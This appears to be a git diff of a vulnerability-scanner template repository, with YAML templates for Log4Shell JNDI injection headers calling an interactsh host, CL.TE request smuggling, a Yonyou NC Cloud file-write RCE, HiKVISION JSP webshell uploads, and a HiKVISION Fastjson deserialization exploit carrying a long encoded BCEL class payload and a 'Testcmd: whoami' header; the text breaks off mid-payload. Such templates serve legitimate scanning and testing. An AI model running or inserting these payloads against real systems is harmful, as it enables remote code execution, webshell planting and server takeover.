CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + tags: apache,rce,log4j,critical,cve -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} + - | POST / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} payloads: log4j_payloads: + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' @@ -200,7 +267,7 @@ requests: - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - + attack: clusterbomb matchers-condition: or matchers: @@ -214,4 +281,6 @@ requests: part: interactsh_protocol name: dns words: - - "dns" \ No newline at end of file + - "dns" + +# Enhanced by topscoder 31.march.2023 \ No newline at end of file diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index ddb83e064d..278b84146d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,37 +1,35 @@ -id: CL-TE-http-smuggling - -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low - -http: - - raw: - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method GPOST")' \ No newline at end of file +id: CL-TE-http-smuggling +info: + name: HTTP request smuggling, basic CL.TE vulnerability + author: pdteam, akincibor + severity: Low +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + - |+ + POST / HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + Content-Length: 6 + Transfer-Encoding: chunked + + 0 + + G + + unsafe: true + matchers: + - type: dsl + dsl: + - 'contains(body, "Unrecognized method GPOST")' diff --git a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml index cef49f23fa..653783158e 100644 --- a/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/javascript/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,36 +1,43 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: yonyou-nc-cloud-jsinvoke-rce - author: pphua + name: Yonyou NC Cloud - Remote Code Execution + author: Co5mos severity: critical - tags: yonyou,nc-cloud,rce - reference: - - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA + description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. + reference: + - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" + tags: yonyou,rce + +variables: + str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept: */* Content-Type: application/x-www-form-urlencoded - Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} + - | - GET /{{randstr}}.txt HTTP/1.1 - Content-Length: 138 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /{{str1}} HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: word + part: body words: - - "StringObject" - part: body \ No newline at end of file + - '5d8be7535d6383e99315739724e10fa7' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml index 538f6fd6d5..e86e8491d1 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_Files.yaml @@ -1,20 +1,19 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Files Arbitrary File Upload Vulnerability + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HiKVISION comprehensive security management platform files interface has an arbitrary file upload vulnerability, allowing attackers to upload arbitrary files through the vulnerability + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" - http: - raw: - | - POST /center/api/files;.html HTTP/1.1 + POST /svm/api/external/report HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a @@ -25,11 +24,17 @@ http: <%out.print("test");%> ------WebKitFormBoundary9PggsiM755PLa54a-- - + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'contains(body_1, "test.jsp")' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' condition: and diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml index 0ebd67934b..7f081b05e0 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml @@ -1,27 +1,48 @@ id: HIKVISION info: - name: HIKVISION + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$